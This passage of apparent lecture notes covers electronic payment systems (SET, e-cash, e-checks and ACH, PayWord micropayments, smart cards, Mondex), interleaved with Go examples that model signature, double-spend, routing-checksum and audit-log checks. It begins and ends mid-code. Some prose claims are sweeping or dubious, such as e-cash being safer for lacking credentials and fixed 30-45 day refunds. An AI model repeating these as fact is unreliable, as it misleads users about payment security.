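	fmt.Printf("merchant accepts tampered OI: %v\n", res.TamperedOIOK)
	fmt.Printf("gateway accepts tampered PI:  %v\n", res.TamperedPIOK)
}
```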

DIGITAL ENVELOPE –

SET PROTOCOL –

The SET protocol has four phases: initiation, purchase, authorization and capture.

• First, the cardholder sends a purchase initiation request to the merchant for initializing the payment. Then the merchant returns a response message to the cardholder.

• In the second phase, the cardholder sends the purchase order together with the payment instruction to the merchant.

• In the third phase, the merchant obtains the authorization from the issuer via the payment gateway.

• Finally, the merchant requests a money transfer to its account.

E-CASH

Electronic money is paperless cash. This money is either stored on a card itself or in an account associated with the card. The most common examples are transit cards, meal plans and PayPal. E-Cash can also mean any kind of electronic payment.

Electronic payment systems come in many forms, including virtual cheques, ATM cards, credit cards and stored value cards. The usual security features for such systems are privacy, authenticity and non-repudiation.

There are four major components in an electronic cash system:

• Issuers

• Customers

• Merchants or traders

• Regulators

Issuers can be banks or non-bank institutions. Customers are the users who spend E-Cash. Merchants and traders are vendors who receive E-Cash. Regulators are defined as related authorities or state tax agencies.

For an E-Cash transaction to occur, we need to go through at least three stages:

• Account Setup: Customers will need to obtain E-Cash accounts through certain issuers. Merchants who would like to accept E-Cash will also need to arrange accounts with various E-Cash issuers. Issuers typically handle accounting for customers and merchants.

• Purchase: Customers purchase certain goods or services and give the merchants tokens which represent the equivalent E-Cash. Purchase information is usually encrypted when transmitted over the network.

• Authentication: Merchants will need to contact E-Cash issuers about the purchase and the amount of E-Cash involved. E-Cash issuers will then authenticate the transaction and approve the amount of E-Cash involved.

E-cash payment system –

For accessing services online, e-cash is a prime method for secure online payments. The following model shows how the e-cash payment system works.

This is a simple model of the E-cash payment system. It gives us the idea of how the e-cash payment system works. The model is explained in the following paragraphs.

The customer approaches his issuer's (bank's) site for accessing his account. The issuer in return issues the money in the form of tokens, which are generally in denominations of tens and hundreds, or as specified by the customer.

In the second phase, the customer endorses those tokens to the merchant for acquiring services, for which the customer authenticates the payment to the trader.

In the third phase, the trader approaches the token issuer (the customer's bank) and, after authenticating the tokens, the issuing bank converts the tokens into electronic funds and transfers the same into the trader's account.

Finally, after getting the payment for the respective services, the trader provides the requisite service or product and also notifies the customer about the approval of the payment made by the customer into the trader's account.

• A system that allows a person to pay for goods or services by transmitting a number from one computer to another.

• Like the serial numbers on real currency notes, the E-cash numbers are unique.

• This is issued by a bank and represents a specified sum of real money.

• It is anonymous and reusable.

Electronic Cash Security

• Complex cryptographic algorithms prevent double spending.

• Anonymity is preserved unless double spending is attempted.

• Serial numbers can allow tracing to prevent money laundering.
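An added example (not the notes' own code) modelling the three stages of the payment model above and the serial-number check that catches double spending: the issuer signs each token with RSA (Go standard library), the trader can verify the signature before contacting the bank, and the issuer redeems a serial only once. Ordinary rather than blind signatures are assumed, so this model gives tracing but not the anonymity the text mentions; all values are constructed.

```go
package main

import (
	"crypto"
	"crypto/rand"
	"crypto/rsa"
	"crypto/sha256"
	"encoding/binary"
	"errors"
	"fmt"
)

// Token is the issuer-signed "number" of the text (a constructed model, not a deployed format).
type Token struct {
	Serial    [16]byte
	Value     uint32 // smallest currency unit, e.g. paise
	Signature []byte
}

// tokenDigest hashes serial and value together so neither can be changed on its own.
func tokenDigest(serial [16]byte, value uint32) []byte {
	var v [4]byte
	binary.BigEndian.PutUint32(v[:], value)
	sum := sha256.Sum256(append(serial[:], v[:]...))
	return sum[:]
}

var ErrBadSignature = errors.New("token not issued by this bank or value altered")
var ErrDoubleSpent = errors.New("serial already redeemed: double spending detected")

// Issuer plays the customer's bank: it mints tokens and keeps the ledger of spent serials.
type Issuer struct {
	key      *rsa.PrivateKey
	redeemed map[[16]byte]bool
}

func NewIssuer() (*Issuer, error) {
	key, err := rsa.GenerateKey(rand.Reader, 2048)
	if err != nil {
		return nil, err
	}
	return &Issuer{key: key, redeemed: make(map[[16]byte]bool)}, nil
}

// Issue is the first phase of the model: the bank hands the customer a signed token.
func (is *Issuer) Issue(value uint32) (Token, error) {
	t := Token{Value: value}
	if _, err := rand.Read(t.Serial[:]); err != nil {
		return t, err
	}
	sig, err := rsa.SignPKCS1v15(rand.Reader, is.key, crypto.SHA256, tokenDigest(t.Serial, t.Value))
	t.Signature = sig
	return t, err
}

// VerifyToken is what a trader can check at purchase time, before contacting the bank.
func VerifyToken(pub *rsa.PublicKey, t Token) error {
	if rsa.VerifyPKCS1v15(pub, crypto.SHA256, tokenDigest(t.Serial, t.Value), t.Signature) != nil {
		return ErrBadSignature
	}
	return nil
}

// Redeem is the third phase: the bank authenticates the token and converts it to funds
// exactly once; a second presentation of the same serial is refused.
func (is *Issuer) Redeem(t Token) (uint32, error) {
	if err := VerifyToken(&is.key.PublicKey, t); err != nil {
		return 0, err
	}
	if is.redeemed[t.Serial] {
		return 0, ErrDoubleSpent
	}
	is.redeemed[t.Serial] = true
	return t.Value, nil
}

// RunScenario walks issue -> redeem with constructed values, then replays the spent token and
// presents a token whose face value the holder raised; it returns the funds credited on the
// honest redemption and the errors the bank returns for the two bad presentations.
func RunScenario() (credited uint32, replayErr, forgedErr error, err error) {
	bank, err := NewIssuer()
	if err != nil {
		return 0, nil, nil, err
	}
	tok, err := bank.Issue(10000) // constructed: one token of 100.00
	if err != nil {
		return 0, nil, nil, err
	}
	if credited, err = bank.Redeem(tok); err != nil {
		return 0, nil, nil, err
	}
	_, replayErr = bank.Redeem(tok) // same serial presented again
	forged := tok
	forged.Value = 1000000 // signature no longer matches serial || value
	_, forgedErr = bank.Redeem(forged)
	return credited, replayErr, forgedErr, nil
}

func main() {
	fmt.Println(RunScenario()) // credited, replay error, forged error, setup error
}
```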

E-Cash Processing

E-cash security

Security is of extreme importance while handling online transactions. Faith in the security of the medium of exchange, whether paper or digital, is essential for the economy to function.

E-cash is more secure than other online payment modes because in this case no credential, such as a card password or anything similar, is involved. It is simply an online fund transfer from the customer's account to the trader's account.

However, while accessing the customer's account, the customer must keep in mind Internet security sweeps or theft. Online hacking and cracking can be avoided by using SSL and TLS website security systems, keeping the website link on safe HTTPS protocols, and using proper Internet security software to keep aside the threats of malware, eavesdropping and other security threats.

Advantages

• We can transfer funds, purchase stocks and access a variety of other services without having to handle physical cash or cheques.

• Electronic cash protects its user against theft. With electronic cash, the customer does not need to provide financial information.

• E-cash supports small payments. Other online payment systems charge a fee for every transaction, no matter how high or low it is, but e-cash has a specific limit below which no additional charges apply, which is why very low payments are not charged a fee.

Limitations

• However secure the e-cash payment system is, no one is safe against online fraud. In this case the trader is the fraudulent party: the trader may take the amount but not provide the services.

• While making the payment, it is very important that the Internet connection and power supply remain active. If the payment is in process and the Internet connection fails in between, it can lead to loss of information, i.e. the amount will be charged but will not reach the trader, and the refund takes a very long time; in general the refund time is at least 30-45 days.

• E-Cash is not for everyone. Low income segments without computer and Internet access are unable to enjoy the usage of E-Cash.

The rise of E-Cash is inevitable, but further improvements are needed. Tackling security, anonymity, low income group readiness and technology reliability issues will make E-Cash closer to perfect. Countries such as India, where people were hesitant to use such methods, have shown a tremendous uptake of online payments and the E-cash payment system. Slowly but steadily the growth is seen, and improving it technologically will make it more reliable and efficient for customers to use.


E-CHECK

What is an electronic check

Itrsquos simply an electronic version of a paper check When you convert a traditional check into an electronic payment you can process it through the Automated Clearing House (ACH) Network to save time and moneymdashand because electronic checks have more security features than a paper check they better protect your business and customers Another way to think of an electronic check is when a customer pays by entering in their bank account information online and electronically sending the money Electronic checks are becoming increasingly popular because they are so fast efficient and secure Electronic checks are sometimes called eChecks electronic check conversions or Back Office Conversions (BOCs) Read more on what you need to know as you consider using eChecks in your business

eCheck, a new payment instrument combining the security, speed and processing efficiencies of all-electronic transactions with the familiar and well-developed legal infrastructure and business processes associated with paper checks, is the first and only electronic payment mechanism chosen by the United States Treasury to make high-value payments over the public Internet.

How electronic checks work

The process is simple. First you run a customer's paper check through an electronic scanner system supplied by your merchant service provider. This virtual terminal captures the customer's banking information and the payment amount. The information is then transferred electronically over the Federal Reserve Bank's ACH Network, which takes the funds from your customer's account and deposits them into yours. After payment approval the virtual terminal prints a receipt for the customer to sign and keep. Your employee should then void the paper check and return it to the customer. You will be able to view and report on your merchant transactions online, although features vary by merchant service provider or payment processing solution provider.

How does the ACH Network work with eChecks?

The ACH Network is a funds distribution system that moves funds electronically from one entity to another. It is a highly reliable and efficient nationwide electronic network governed by the rules of the National Automated Clearing House Association (NACHA) and the Federal Reserve (Fed). Given its ability to transfer money directly to and from bank accounts, ACH is a faster payment method than traditional paper checks. The ACH payment process is close to the paper check process, only faster: clients give their bank routing number and checking account number and, after verification, the payment is submitted electronically through the ACH system (settlement follows in batch, typically within 1-3 business days). Besides checks, the ACH Network also handles debit card transactions, direct deposits of payroll, Social Security and other government benefits, direct debit payments and business-to-business payments.


Reaping the benefits of eChecks

Converting your customers' paper checks into electronic checks saves time and reduces hassle for your staff, because you can submit payments electronically instead of making trips to the bank. Time saving and hassle reduction are not the only benefits:

1. Reduce processing costs by up to 60 percent. eChecks require less manpower to process and do not come with deposit or transaction fees, so processing an eCheck is generally much cheaper than processing a paper check or a credit card transaction.

2. Receive funds sooner. Businesses that use electronic check conversion have their funds deposited almost twice as fast as those using traditional check processing; billing companies often receive payments within one day.

3. Increase sales. If your business does not accept paper checks, offering eChecks expands your customers' options and can increase sales. If you are converting from paper checks to eChecks you can start accepting international and out-of-state checks while using account validation and customer authentication processes to protect your business from fraud.

4. Work smarter and greener. Electronic check conversion is easy to set up and relies on the trusted ACH Network, and eChecks help reduce the more than 674 million gallons of fuel and 3.6 million tons of greenhouse gas emissions attributed to transporting paper checks.

5. Decrease errors and fraud. eChecks reduce the potential for errors and fraud because fewer people handle them. Merchant service providers also maintain and monitor negative account databases, which store information about individuals or companies with a record of fraud, and check incoming items against them.

Protecting your business and your customers

Electronic check conversion is one of the more secure payment methods in the electronic payment processing industry because it uses current information protection features:

1. Authentication. Merchants must verify that the person providing the checking account information has the authority to use that account. Authentication services and products available to merchants include digital signatures and public key cryptography. A digital signature does not encrypt the data; it gives the receiver a reliable indication that the information was actually produced by the holder of the signing key and has not been changed since. (A digital certificate is a separate object: it binds a public key to an identity, so the verifier knows whose signature it is checking.) Digital signatures are used on the Internet to confirm the identity of a customer much as a handwritten signature would; because they are difficult to forge and easy to transmit, they are a good way to verify identity. They are often used to implement electronic signatures, which include any electronic data that carries the intent of a signature. Public key cryptography is a security method that uses a pair of keys: with electronic check conversion the private key is a secret value used to create the digital signature on the echeck, and the public key is given to anyone who needs to verify that the sender signed the echeck and that the electronic transfer has not been tampered with.

2. Duplicate detection. Financial institutions use software and operational controls to prevent and detect duplicate presentment of the scanned electronic representations of customer checks.

3. Encryption. Data in transit is encrypted; the source cites 128-bit encryption over the Secure Sockets Layer (SSL), the protocol since succeeded by TLS.

How to get started with electronic checks

Here is how to implement electronic check conversion as quickly and easily as possible:

1. Choose a well-established processing company. Good pricing is important, but working with a reliable processor is essential.

2. Notify your customers that your business will begin using electronic check conversion. Federal law requires you to post a notification about this change and give your customers a takeaway copy. You must also provide customers with a phone number to request more information.

3. Look for a processor that makes it easy to align your current business processes with your new electronic processing system, export customer data and integrate the new system with your business management software.

4. QuickBooks Payments offers a complete payment processing solution. Businesses can take payments from their customers in many ways, from ACH bank payments and electronic checks to credit cards including Visa, MasterCard, Discover and American Express. QuickBooks Payments also lets businesses email invoices to their customers with a Pay Now button; Intuit's own data, according to the vendor, shows that businesses using QuickBooks Payments are paid twice as fast because of the e-invoicing feature.
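The authentication and duplicate-detection controls described under "Protecting your business" above, as an added example that is not part of the original notes or of any processor's code: the payer signs a simplified e-check with an ECDSA private key, and the receiving side verifies that signature with the payer's public key before checking the check number against the set it has already accepted. The ECheck field set, the JSON canonicalisation and the choice of P-256 ECDSA are assumptions for illustration, not the FSTC eCheck format or any bank's scheme.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/sha256"
	"encoding/json"
	"errors"
	"fmt"
)

// ECheck is a simplified e-check body (assumed field set, not FSTC's schema).
type ECheck struct {
	CheckNumber string `json:"check_number"`
	Routing     string `json:"routing"`
	Account     string `json:"account"`
	Payee       string `json:"payee"`
	AmountCents int64  `json:"amount_cents"`
}

// digest canonicalises the check as JSON (Go marshals struct fields in
// declaration order, so the encoding is stable) and hashes it. The signature
// covers every field, so changing any of them invalidates it.
func digest(c ECheck) ([]byte, error) {
	b, err := json.Marshal(c)
	if err != nil {
		return nil, err
	}
	h := sha256.Sum256(b)
	return h[:], nil
}

// Sign produces the payer's digital signature over the check with the
// payer's private key.
func Sign(priv *ecdsa.PrivateKey, c ECheck) ([]byte, error) {
	d, err := digest(c)
	if err != nil {
		return nil, err
	}
	return ecdsa.SignASN1(rand.Reader, priv, d)
}

// Receiver is the payee/bank side: it holds the payer's public key and the
// set of check numbers already presented (duplicate detection).
type Receiver struct {
	payerKey *ecdsa.PublicKey
	seen     map[string]bool
}

func NewReceiver(pub *ecdsa.PublicKey) *Receiver {
	return &Receiver{payerKey: pub, seen: map[string]bool{}}
}

var (
	ErrBadSignature = errors.New("signature does not verify: tampered or wrong signer")
	ErrDuplicate    = errors.New("duplicate presentment of check number")
)

// Accept verifies the signature first and only then checks for replay.
// The order matters: an unsigned forgery must not be able to "burn" a
// legitimate check number before the real check arrives.
func (r *Receiver) Accept(c ECheck, sig []byte) error {
	d, err := digest(c)
	if err != nil {
		return err
	}
	if !ecdsa.VerifyASN1(r.payerKey, d, sig) {
		return ErrBadSignature
	}
	if r.seen[c.CheckNumber] {
		return ErrDuplicate
	}
	r.seen[c.CheckNumber] = true
	return nil
}

func main() {
	// Constructed sample: a fresh payer key and one check; no real account.
	priv, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	chk := ECheck{CheckNumber: "1042", Routing: "021000021", Account: "123456789",
		Payee: "Example Merchant", AmountCents: 12999}
	sig, _ := Sign(priv, chk)
	rcv := NewReceiver(&priv.PublicKey)
	fmt.Println("first presentment:", rcv.Accept(chk, sig)) // <nil>
	fmt.Println("replay:           ", rcv.Accept(chk, sig)) // duplicate
	altered := chk
	altered.AmountCents = 1299900 // payee tries to inflate the amount
	fmt.Println("altered amount:   ", rcv.Accept(altered, sig)) // bad signature
}
```

In a deployment the receiver would look up the public key through the payer's certificate rather than receive it out of band, and the "seen" set would live in the bank's database so that duplicate detection survives restarts and works across channels.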

This diagram illustrates how real-time electronic check processing works using the CyberSource Payment Service:

1. The payer (customer or bill payer) is prompted to authorize an electronic debit and to enter the bank routing number (ABA) and account number.

2. The merchant's sales system securely transfers the order information to CyberSource over the Internet.

3. CyberSource forwards the bank routing number and account number to the processor.

4. The routing number and account number are validated and the integrity of the account's checking history is verified. The processor forwards the approve/decline result to CyberSource.

5. CyberSource returns the approval/decline message to the merchant.

6. If approved, CyberSource routes the check for settlement through a processor to the Automated Clearinghouse System (ACH). Funds are deposited in approximately 1-3 business days.
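Step 4 above says the routing number is validated. The first thing any processor does with a routing number is the ABA check-digit test; the following is an added example (not the notes' or CyberSource's code) implementing it in Go. The sample inputs are constructed for the demonstration and are not tied to any account, and the prefix ranges in PlausibleABAPrefix are an assumption taken from the ABA allocation scheme rather than something the notes state.

```go
package main

import (
	"fmt"
	"strings"
)

// abaWeights: the ABA check-digit rule weights the nine digits 3,7,1,3,7,1,3,7,1
// and requires the weighted sum to be divisible by 10.
var abaWeights = [9]int{3, 7, 1, 3, 7, 1, 3, 7, 1}

// normalizeRouting strips the separators payers commonly type ("0210-0002-1").
func normalizeRouting(s string) string {
	return strings.NewReplacer("-", "", " ", "").Replace(strings.TrimSpace(s))
}

// ValidABARoutingNumber reports whether s is a nine-digit ABA routing transit
// number with a consistent check digit. It is a syntactic check only: it
// catches mistyped or transposed digits, not whether the bank or account
// exists; that is what the separate account-validation step is for.
func ValidABARoutingNumber(s string) bool {
	d := normalizeRouting(s)
	if len(d) != 9 {
		return false
	}
	sum := 0
	for i := 0; i < 9; i++ {
		c := d[i]
		if c < '0' || c > '9' {
			return false
		}
		sum += int(c-'0') * abaWeights[i]
	}
	return sum%10 == 0
}

// PlausibleABAPrefix applies a second, independent rule: the first two digits
// identify the Federal Reserve routing region, and only the ranges 00-12,
// 21-32, 61-72 and 80 are assigned (assumed from the published ABA
// allocation; confirm against current ABA guidance before relying on it).
func PlausibleABAPrefix(s string) bool {
	d := normalizeRouting(s)
	if len(d) != 9 || d[0] < '0' || d[0] > '9' || d[1] < '0' || d[1] > '9' {
		return false
	}
	p := int(d[0]-'0')*10 + int(d[1]-'0')
	switch {
	case p <= 12, p >= 21 && p <= 32, p >= 61 && p <= 72, p == 80:
		return true
	}
	return false
}

func main() {
	// Constructed inputs: valid, valid with separators, bad check digit,
	// a transposition of the first one, and an unassigned prefix.
	for _, r := range []string{"021000021", "0110-0001-5", "021000022", "012000021", "99 1000021"} {
		fmt.Printf("%-12s checksum=%-5v prefix=%v\n", r, ValidABARoutingNumber(r), PlausibleABAPrefix(r))
	}
}
```

Note that the weighted checksum catches single-digit errors and adjacent transpositions (the two common data-entry mistakes) but nothing more; a routing number that passes both functions may still belong to a closed institution, which only a live lookup against the Fed's routing directory or an account-validation service will reveal.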

Four Different Scenarios of the FSTC E-check System


MICROPAYMENT METHODS

Traditional payment methods are called macropayment methods. A new type of payment method, known as a micropayment method, is emerging to cater for very low value transactions. Examples: Millicent (pre-payment/credit based) and PayWord (post-payment).


A MICROPAYMENT IS:

Very small payments made over the Web

Transactions too small for credit cards

Can be as little as a fraction of a cent

An alternative to subscription and advertising

Can go in either direction

A micropayment is an e-commerce transaction involving a very small sum of money in exchange for something made available online, such as an application download, a service or Web-based content.

Micropayments are sometimes defined as anything less than 75 cents and can be as low as a fraction of a cent. A special type of system is required for such payments, which are too small to be processed economically through credit card companies.

Here is one scheme for micropayment. The user and seller each establish an account with a third-party service provider who monitors, collects and distributes micropayments. The seller encodes per-fee links inside a Web page. When the user initiates a transaction, payment goes through an Internet wallet account managed by the service provider. Micropayments accumulate until they are collected as single larger payments. Such a system is helpful when a user wants to make one-time micropayments to multiple sellers; seller-based accounts are more common for repeat business with an individual enterprise.
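PayWord, listed above as the post-payment example, and the third-party aggregation scheme just described rest on the same idea: many tiny payments are verified cheaply, offline, and settled once as a larger sum. The block below is an added example, not code from the notes or from the PayWord authors, of the hash-chain construction (assumed from Rivest and Shamir's published PayWord design): the customer commits to the root of a SHA-256 chain, spends one coin per revealed link, the vendor checks each link with a few hashes and no network call, and the broker settles the whole run from a single (payword, index) pair. The type names, the one-coin granularity and the chain cap are assumptions; the customer's signature over the commitment, which the real scheme requires, is left out.

```go
package main

import (
	"bytes"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
)

// MaxChain bounds the work a vendor will do per payment; without it a
// customer could present an absurd index and make the vendor hash forever.
const MaxChain = 10000

func hash(b []byte) []byte {
	h := sha256.Sum256(b)
	return h[:]
}

// NewChain builds a PayWord chain for n coins. w[n] is random and each
// w[i] = H(w[i+1]); w[0] is the root the customer commits to. Coins are
// spent by revealing w[1], w[2], ... in order.
func NewChain(n int) ([][]byte, error) {
	if n <= 0 || n > MaxChain {
		return nil, errors.New("chain length out of range")
	}
	w := make([][]byte, n+1)
	seed := make([]byte, 32)
	if _, err := rand.Read(seed); err != nil {
		return nil, err
	}
	w[n] = seed
	for i := n - 1; i >= 0; i-- {
		w[i] = hash(w[i+1])
	}
	return w, nil
}

// Vendor keeps, per customer, the committed root and the last payword it
// accepted; count is both the index of that payword and the coins owed.
type Vendor struct {
	root  []byte
	last  []byte
	count int
}

func NewVendor(root []byte) *Vendor { return &Vendor{root: root, last: root} }

var ErrInvalidPayword = errors.New("payword rejected: replay, out of range, or does not hash to the last accepted value")

// Accept verifies w[i] by hashing it (i - count) times and comparing with the
// last accepted value. Each payment costs the vendor a few hashes and no
// round trip to the broker, which is what makes sub-cent pricing viable.
func (v *Vendor) Accept(wi []byte, i int) error {
	if i <= v.count || i > MaxChain {
		return ErrInvalidPayword
	}
	x := wi
	for k := 0; k < i-v.count; k++ {
		x = hash(x)
	}
	if !bytes.Equal(x, v.last) {
		return ErrInvalidPayword
	}
	v.last, v.count = wi, i
	return nil
}

// Redeem returns the single (payword, index) pair the vendor sends the broker
// at the end of the period: the whole run of micropayments settles as one
// macro-payment of count coins.
func (v *Vendor) Redeem() ([]byte, int) { return v.last, v.count }

// BrokerVerify is the broker's check of that claim against the root the
// customer committed to.
func BrokerVerify(root, wk []byte, k int) bool {
	if k < 0 || k > MaxChain {
		return false
	}
	x := wk
	for i := 0; i < k; i++ {
		x = hash(x)
	}
	return bytes.Equal(x, root)
}

func main() {
	w, _ := NewChain(100) // constructed: a customer with a 100-coin chain
	v := NewVendor(w[0])
	fmt.Println("pay 1 coin:   ", v.Accept(w[1], 1))
	fmt.Println("pay 1 more:   ", v.Accept(w[2], 2))
	fmt.Println("pay 3 at once:", v.Accept(w[5], 5))
	fmt.Println("replay w[5]:  ", v.Accept(w[5], 5))
	fmt.Println("forged coin:  ", v.Accept([]byte("not a payword"), 6))
	wk, k := v.Redeem()
	fmt.Println("broker settles", k, "coins:", BrokerVerify(w[0], wk, k))
}
```

The security of the chain is the preimage resistance of the hash: a vendor that has seen w[5] cannot produce w[6], so it cannot overclaim, and the customer cannot reuse a link because the vendor only moves forward. What the scheme does not protect against is the customer double-spending the same chain at two different vendors, which is why the real design binds the commitment to one vendor and has the customer sign it.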

Once a common micropayment standard has been established, some experts predict that streaming media sites, music and application downloads, content vendors, sports access sites and other specialized resources will make pay-per-use common online.

Advantages and risks

With a micropayment system many small transactions are summarised over a defined period of time and charged in one bill. For that reason micropayments suit businesses where even small per-transaction costs would be inefficient. The main benefits on the customer side are speed and flexibility; on the merchant side, speed and acceptable transaction fees matter most. As the transactions involve small amounts, security does not have the highest priority; much more important than security is trust. Users and merchants are more likely to use an insecure payment system from a trusted company than a secure payment system from an untrusted (unknown) company. Therefore the market entry barriers for new providers are high: any company that wishes to enter this area must have plenty of capital and be willing to invest a lot before any return on investment, as it is extremely difficult for new payment systems to achieve widespread acceptance.

Payment options

Micropayment providers offer various payment modules. Merchants sign up for an account with a chosen provider and decide on a module that suits their needs; the customer then gets one or more options for paying for the desired content or goods.

The most common micropayment options are listed below.

Call2pay: payment by telephone. The customer is requested to call a toll number; the fee is set on a per-call basis for the desired payment amount.

Handypay: payment via the mobile phone bill. The customer enters his or her mobile phone number and receives an SMS with a TAN (transaction number) with which to confirm the payment.

Ebank2pay: payment using online banking. The customer transfers the payment amount using his or her online banking access and a TAN; after the payment is made the customer receives access to the purchased product.

Credit card: the customer enters credit card data and confirms the transaction. The transaction can optionally be carried out with the 3-D Secure method (Verified by Visa and MasterCard SecureCode).

Direct debit: the customer enters his or her bank identifier and account number and confirms the direct debit authorization.

PayPal MicroPayments is a micropayment system that charges payments to the user's PayPal account and allows transactions of less than US$12. As of 2013 the service is offered in select currencies only.

Micropayment Uses

Publishing

Marketing

Software

Entertainment

Web Services

SMART CARD

A smart card, chip card or integrated circuit card (ICC) is any pocket-sized card with embedded integrated circuits. Smart cards are made of plastic, generally polyvinyl chloride, but sometimes polyethylene terephthalate-based polyesters, acrylonitrile butadiene styrene or polycarbonate. Since April 2009 a Japanese company has manufactured reusable financial smart cards made from paper.

Smart cards can provide identification, authentication, data storage and application processing. Smart cards may provide strong authentication for single sign-on (SSO) within large organizations.

A smart card is any pocket-sized card with embedded integrated circuits that can process data: it can receive input, which is processed and delivered as output.

What is a Smart Card?

Standard credit-card size with a microchip embedded in it

Two types

Memory-only chips

Microprocessor chips

Can hold up to 32000 bytes (32 KB) of data

Newer smart cards have math co-processors

Perform complex encryption routines quickly

In 1968 German inventors patented the combination of plastic cards with microchips

Construction of Smart Cards


Why Smart Cards

Improve the convenience and security of any transaction

Provide tamper-resistant storage of user and account identity

Provide vital components of system security

Protect against a broad range of security threats

Advantages

Flexibility

Security

Portability

Increasing data storage capacity

Reliability

Schematic overview of a smart card


Smart card Processing

Smart Card Applications

Ticketless travel

Seoul bus system: 4M cards, 1B transactions since 1996

Planned for the SF Bay Area system

Authentication, ID

Medical records

Ecash

Store loyalty programs

Personal profiles

Government

Licenses

Mall parking

Example: Mondex


OVERVIEW OF MONDEX

Mondex is a smart card electronic cash system which was originally developed by National Westminster Bank in the United Kingdom and subsequently sold to MasterCard International. Mondex launched in a number of markets during the 1990s, expanding from an original trial in Swindon, UK, to Hong Kong, Guelph and New York. It was also trialled on several British university campuses from the late 1990s, including the University of Edinburgh, University of Exeter (between 1997 and 2001), University of York, University of Nottingham, Aston University and Sheffield Hallam University.

Direct transfer of electronic money between two cards

Transfer of electronic money over the Internet, telephone networks, etc.

Keep transaction records

Password protection and "lock card" functions

Portable balance finder to check balance

Support multiple currencies


ADVANTAGES

CONSUMER

Convenience

Accessibility

On chip record of recent transactions

Home load

Internet purchases

MERCHANT

Reliable offline payment

Higher security

Low transaction cost

Reduced cash handling

FINANCIAL INSTITUTION

Strengthen customer relationships

New financial and commercial partnerships

Mondex is a concept for an electronic payment system that provides an alternative to cash, particularly small currency and coins (micro-payment). The concept was invented in 1990 by Tim Jones and Graham Higgins at National Westminster Bank (NatWest) in the UK.

In July 1996, at the initiative of NatWest and Midland Bank PLC, Mondex International Ltd was officially established by 17 major banks from North America, Asia/Pacific and Europe and was granted an exclusive licensing agreement with NatWest for the intellectual property rights to develop the Mondex concept, technology and brand. In the same year MasterCard International acquired 51% ownership of Mondex International and fully endorsed the Mondex technology architecture.

How does Mondex protect privacy?

Principles protected

o Limits for collecting personal information

o limits for using disclosing and keeping personal information

o keeping personal information accurate

o safeguarding personal information


Limits for collecting personal information

o loads from account

o deposits into account

o lost transactions

Limits for using disclosing and keeping personal information

o safeguard deposits

o to re-imburse for non-performance

Keeping personal information accurate

o load and unload are online

o a rolling log of the last 10 transactions provides the exact spend and retailer name

Safeguarding personal information

o firewalls in MULTOS between applications (ITSEC E6 designation)

o transaction data to retailer is deliberately limited

o individual transaction data is not collected by banks: Mondex is an unaudited system


The design of a Mondex smart card allows end users to transfer funds electronically onto the card and then use it to make purchases up to the total cash value held on the card. Mondex smart cards provide an electronic payment system using all the capabilities associated with smart card technology, and the card can be a convenient alternative to cash.

Although the design was five years old at the time, the Mondex smart card was actually launched in 1995, two years before MasterCard assumed control of the technology.

The banks that currently support the Mondex smart card include National Bank of Canada, Scotiabank, Canada Trust, Bank of Montreal, Le Mouvement des caisses Desjardins and Toronto Dominion Bank. With so many respected lending institutions banking on the idea, the Mondex smart card is worth a closer look.

The Mondex smart card has the ability to make card-to-card transfers, which is not possible with standard credit or debit cards. When you use a credit or debit card to make a purchase, communication is required between the bank and your card. Mondex cards, however, contain an embedded microprocessor with cryptographic functions and tamper-resistant hardware designed to protect them from attackers. The ability of the Mondex smart card to do offline transactions means it is less dependent on expensive network infrastructure, reducing transaction costs. Offline transactions may seem anonymous; however, they are actually recorded in the memory of the card's microprocessor and remain retrievable the next time the card is used at an ATM, or as soon as the retailer uploads transaction data to the bank's computer.

A significant disadvantage of Mondex is that transactions are not truly anonymous. Unlike pre-paid phone cards, which are also based on smart card technology, you cannot purchase a Mondex card without revealing your identity. Each card has a unique identification number through which the owner can easily be identified. Mondex smart cards have not been as successful as originally predicted, and customers have not been especially satisfied with the card and its services. Unlike a credit or debit card, your money may be lost forever if you lose a Mondex smart card: losing one is just like losing a wallet full of cash. With a credit card you are protected against any loss exceeding $50; this protection is not currently available with a Mondex smart card.

According to Mondex the system is fully auditable: there is a log of the time, date, amount and participants of each transaction, which hampers the privacy of users. Technically, however, Mondex cannot claim to be a fully auditable system. After a number of transactions an overflow can occur because of the limited memory in the Mondex smart card, which means that significant data may be lost before Mondex is able to retrieve it. Critics say this loss of data is a critical design flaw, making it difficult for Mondex to reliably detect fraud.

While Mondex smart cards are not a hundred percent secure, the system is designed to tolerate minor fraud losses.

Mondex believes its electronic payment system is secure and is convinced that critics who have voiced concern over security issues are mistaken and misinformed. Perhaps the use of a Mondex smart card depends on a personal level of trust.
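The audit-gap criticism above, as an added example that is a simplified model and not Mondex's protocol or code: each purse keeps a rolling ten-entry log, value moves card-to-card offline, and the bank reconciles by replaying the uploaded log over the balance it last recorded. Once more than ten transfers happen between uploads, the replay no longer explains the balance, and the bank cannot tell dropped log entries from fabricated value. The purse structure, the amounts and the omission of the cryptographic peer authentication a real card performs are all assumptions of this example.

```go
package main

import (
	"errors"
	"fmt"
)

// LogSize is the rolling log depth the notes attribute to Mondex cards.
const LogSize = 10

// Entry is one logged transfer as the card records it: positive amounts are
// value received, negative amounts value paid out (in cents).
type Entry struct {
	Seq    int
	Peer   string
	Amount int
}

// Purse models a stored-value card. The balance is the only authoritative
// record of value; the log is a ring of the last LogSize entries.
type Purse struct {
	ID      string
	Balance int
	seq     int
	log     []Entry
	dropped int // entries overwritten since the last upload to the bank
}

func NewPurse(id string, balance int) *Purse { return &Purse{ID: id, Balance: balance} }

func (p *Purse) record(peer string, amount int) {
	p.seq++
	if len(p.log) == LogSize {
		p.log = p.log[1:] // the oldest entry is gone for good
		p.dropped++
	}
	p.log = append(p.log, Entry{Seq: p.seq, Peer: peer, Amount: amount})
}

var ErrInsufficient = errors.New("transfer refused: amount not positive or exceeds value on card")

// Transfer moves value card-to-card with no bank in the loop. The real card
// authenticates the peer cryptographically before doing this; that exchange
// is omitted because the point here is what the bank can see afterwards.
func Transfer(from, to *Purse, amount int) error {
	if amount <= 0 || from.Balance < amount {
		return ErrInsufficient
	}
	from.Balance -= amount
	to.Balance += amount
	from.record(to.ID, -amount)
	to.record(from.ID, amount)
	return nil
}

// Reconcile is the bank's check at upload time. It replays the log it
// receives on top of the balance it last knew and returns the value it
// cannot explain. gap == 0 means every cent is accounted for; once the log
// has overflowed, gap != 0 and the bank cannot tell lost entries from value
// that was created fraudulently.
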